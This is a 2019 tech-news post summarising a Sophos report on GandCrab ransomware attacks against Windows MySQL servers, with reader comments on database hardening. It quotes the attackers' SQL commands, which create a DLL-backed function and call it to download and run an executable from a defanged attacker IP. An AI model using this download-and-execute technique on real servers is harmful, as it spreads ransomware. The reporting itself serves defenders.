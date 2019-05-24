from the don't-do-that dept.
Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.
The attack delivers the GandCrab ransomware.
The attackers attempt to connect to the database server and establish that it is running a MySQL instance.
Then, the attacker uses the "set" command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.
The attacker concatenates the bytes into one file and drops them into the server's plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.
The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:
CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
The command to invoke the xpdl3 function is:
select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')
Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.
Tracking back through the attack chain, the researchers determined that the malware was downloaded from the source ~3100 times since mid April. Each download potentially indicating an infection, although presumably some were, as in Sophos' case, honeypots where no actual damage was done. The user interface of the system (geolocated in Arizona) hosting the malware is in simplified Chinese.
While not a widespread attack by numbers, it does represent a significant risk to MySQL databases exposed online.
(Score: 2) by The Mighty Buzzard on Monday May 27, @09:27PM
Who in the cornbread hell allows anonymous Internet access to their database servers?
Oh, right. Nevermind.
(Score: 0) by Anonymous Coward on Monday May 27, @09:42PM (2 children)
Great article, thanks randomfactor.
Also, Buzz, sometimes attackers have a foothold inside the local network, at which point yes they can see the sql db, because if the prod network can't see it then it's effectively down and things using it will fail. So while this might not be exposing smart admins' dbs directly, it sure does weaken things, because who knows what Joe or Jane Dev has installed, and their machine can reach the db.
(Score: 2) by edIII on Monday May 27, @09:53PM
Good point about the internal network, but if you're serious about security, database servers are on their own internal network. These things can be separated out so that an employee computer as no access whatsoever to other sensitive internal networks.
Still though, this is Windows. If anybody has access to an internal network with Windows machines running, it's akin to a fox having the run of the hen house. There's a reason why you don't directly connect a Windows server to the Internet.
(Score: 2) by NotSanguine on Monday May 27, @10:00PM
Even so, how does an anonymous connection have the privileges to add and drop tables/functions, *let alone* write data directly to the filesystem?
I did read TFA and they don't mention any attempts at bypassing authentication. At the same time, the "compromise" of the Sophos MySQL instance wasn't actually on an instance of MySQL. Rather it was a honeypot [wikipedia.org] that just accepted any connections/commands sent to it.
I'd expect that any MySQL instance that allows such access has either not been secured and/or poor configuration made this possible. Add/drop and filesystem access privilegess on MySQL should be restricted to root and MySQL users *explicitly* granted such privileges.
I'm glad I don't run MySQL and use MariaDB instead. :)
No, no, you're not thinking; you're just being logical. --Niels Bohr